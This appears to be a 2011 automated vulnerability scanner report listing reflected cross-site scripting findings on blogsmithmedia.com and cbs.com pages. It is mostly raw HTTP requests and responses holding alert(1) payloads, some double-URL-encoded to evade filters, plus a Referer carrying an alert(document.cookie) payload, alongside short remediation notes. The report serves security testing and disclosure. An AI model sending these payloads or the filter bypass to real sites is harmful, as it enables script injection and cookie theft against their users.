<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <input type="hidden" name="url" value="__FEED__?8e7a9--><script>alert(1)</script>d0fb6fba531=1" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ec2"><script>alert(1)</script>215fa641396 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/includea8ec2"><script>alert(1)</script>215fa641396/background.js?9 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:26 GMT Connection: close Vary: Accept-Encoding Content-Length: 17210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/includea8ec2"><script>alert(1)</script>215fa641396/background.js?9"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31a15%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3fdbd1e6334 was submitted in the REST URL parameter 2. This input was echoed as 31a15</script><script>alert(1)</script>3fdbd1e6334 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include31a15%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3fdbd1e6334/background.js?9 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:31 GMT Connection: close Vary: Accept-Encoding Content-Length: 17540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... 5.pfxID="acg"; s_265.pageName=s_265.pfxID+" : "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8778a"><script>alert(1)</script>7e8b93ad6cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/include/background.js8778a"><script>alert(1)</script>7e8b93ad6cb?9 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:36 GMT Connection: close Vary: Accept-Encoding Content-Length: 16949
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/include/background.js8778a"><script>alert(1)</script>7e8b93ad6cb?9"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17ac5%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2345f2523d8 was submitted in the REST URL parameter 3. This input was echoed as 17ac5</script><script>alert(1)</script>2345f2523d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include/background.js17ac5%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2345f2523d8?9 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:39 GMT Connection: close Vary: Accept-Encoding Content-Length: 17166
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de43a"><script>alert(1)</script>b3021176c3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/includede43a"><script>alert(1)</script>b3021176c3f/citysbest-min.js?29 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:26 GMT Connection: close Vary: Accept-Encoding Content-Length: 17226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/includede43a"><script>alert(1)</script>b3021176c3f/citysbest-min.js?29"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53e47%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021195fdc5c was submitted in the REST URL parameter 2. This input was echoed as 53e47</script><script>alert(1)</script>021195fdc5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include53e47%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021195fdc5c/citysbest-min.js?29 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:32 GMT Connection: close Vary: Accept-Encoding Content-Length: 17561
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... 5.pfxID="acg"; s_265.pageName=s_265.pfxID+" : "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5263a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e68c5b25362 was submitted in the REST URL parameter 3. This input was echoed as 5263a</script><script>alert(1)</script>68c5b25362 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include/citysbest-min.js5263a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e68c5b25362?29 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:40 GMT Connection: close Vary: Accept-Encoding Content-Length: 17181
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8067e"><script>alert(1)</script>4d5b9bcd035 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/include/citysbest-min.js8067e"><script>alert(1)</script>4d5b9bcd035?29 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:37 GMT Connection: close Vary: Accept-Encoding Content-Length: 16969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/include/citysbest-min.js8067e"><script>alert(1)</script>4d5b9bcd035?29"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dbc2"><script>alert(1)</script>68a23f41548 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/media2dbc2"><script>alert(1)</script>68a23f41548/citysbest-min.css?1 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:27 GMT Connection: close Vary: Accept-Encoding Content-Length: 17204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/media2dbc2"><script>alert(1)</script>68a23f41548/citysbest-min.css?1"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e675d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e541a2799520 was submitted in the REST URL parameter 2. This input was echoed as e675d</script><script>alert(1)</script>541a2799520 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/mediae675d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e541a2799520/citysbest-min.css?1 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:33 GMT Connection: close Vary: Accept-Encoding Content-Length: 17543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... 265.pfxID="acg"; s_265.pageName=s_265.pfxID+" : "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab18e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4284ffb3765 was submitted in the REST URL parameter 3. This input was echoed as ab18e</script><script>alert(1)</script>4284ffb3765 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/media/citysbest-min.cssab18e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4284ffb3765?1 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:40 GMT Connection: close Vary: Accept-Encoding Content-Length: 17166
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... +pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd84"><script>alert(1)</script>0353f801000 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/media/citysbest-min.css8bd84"><script>alert(1)</script>0353f801000?1 HTTP/1.1 Host: www.blogsmithmedia.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:37 GMT Connection: close Vary: Accept-Encoding Content-Length: 16950
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/media/citysbest-min.css8bd84"><script>alert(1)</script>0353f801000?1"/> ...[SNIP]...
1.280. http://www.cbs.com/primetime/big_bang_theory/video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs.com
Path:
/primetime/big_bang_theory/video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c0f6"-alert(1)-"e4eac61e9e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /primetime/big_bang_theory/video/?4c0f6"-alert(1)-"e4eac61e9e2=1 HTTP/1.1 Host: www.cbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!-- SEO Begin --> <m ...[SNIP]... /672/71/CBS_BIGBANG_414_IMAGE_CIAN_140x80.jpg", title: "The Big Bang Theory - The Thespian Catalyst", message: 'Cool message here', backLink: "http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6"-alert(1)-"e4eac61e9e2=1", //when clicked on title description: "Sheldon hopes acting lessons from Penny will help him become a better teacher. Meanwhile, Koothrappali fantasizes about his best friend\'s girlfriend.",
The value of the nrd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30822"-alert(1)-"b5ec47ba216 was submitted in the nrd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y&nrd=130822"-alert(1)-"b5ec47ba216 HTTP/1.1 Host: www.cbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.14 Status: 404 Not Found X-Real-Server: ws3172.drt.cbsig.net Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 06 Feb 2011 20:16:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:16:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Sun, 06-Feb-2011 21:16:48 GMT Set-Cookie: video_section=Default; expires=Sun, 06-Feb-2011 21:16:48 GMT Content-Length: 81585
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!-- SEO Begin --> <m ...[SNIP]... jpg", title: "The Big Bang Theory - The Thespian Catalyst", message: 'Cool message here', backLink: "http://www.cbs.com/primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y&nrd=130822"-alert(1)-"b5ec47ba216", //when clicked on title description: "Sheldon hopes acting lessons from Penny will help him become a better teacher. Meanwhile, Koothrappali fantasizes about his best friend\'s girlfriend.", st ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51552'%3balert(1)//95d5c871903 was submitted in the pid parameter. This input was echoed as 51552';alert(1)//95d5c871903 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y51552'%3balert(1)//95d5c871903&nrd=1 HTTP/1.1 Host: www.cbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.14 Status: 404 Not Found X-Real-Server: ws3198.drt.cbsig.net Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 06 Feb 2011 20:16:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:16:42 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Sun, 06-Feb-2011 21:16:43 GMT Set-Cookie: video_section=Default; expires=Sun, 06-Feb-2011 21:16:43 GMT Content-Length: 79509
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 141fb"%3balert(1)//565b10a0203 was submitted in the pid parameter. This input was echoed as 141fb";alert(1)//565b10a0203 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y141fb"%3balert(1)//565b10a0203&nrd=1 HTTP/1.1 Host: www.cbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.14 Status: 404 Not Found X-Real-Server: ws3227.drt.cbsig.net Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 06 Feb 2011 20:16:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:16:40 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Sun, 06-Feb-2011 21:16:41 GMT Set-Cookie: video_section=Default; expires=Sun, 06-Feb-2011 21:16:41 GMT Content-Length: 84324
